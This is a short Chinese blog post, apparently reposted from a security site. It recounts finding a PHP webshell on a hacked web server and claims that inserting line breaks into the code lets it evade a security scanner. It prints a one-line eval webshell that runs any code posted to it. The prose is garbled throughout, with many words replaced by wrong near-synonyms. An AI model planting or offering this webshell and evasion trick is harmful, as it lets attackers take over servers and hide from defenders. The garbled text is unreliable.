将代码换行绕过web维护琐细
早上的时候,听共事说web呈现错位了,一看源代码,缔造被挂暗链了。是以四处事器毒手拿体贴神查杀了一下,缔造揭示没有找到。。。。
<<免杀体贴神一句话小马>>
还以为真的没有,尔后想着看看日志文件,是通过什么法子挂的
缔造有一个IP在频仍接见访问一个陌生的php文件
翻开一看,副本是小马。。。
无语。。。
换来是换行了,所以体贴神查不到了,又重新查了一下,还是查不到,呵呵,看来这样也能够遁藏查杀。
不过就是不晓得其他查杀琐细能否过。
Default
123456
|
nono< ?phpeval($_POST[1]) ?> |
本文作者koohik由网络安全攻防研究室(www.91ri.org)动静安全小组收集整理。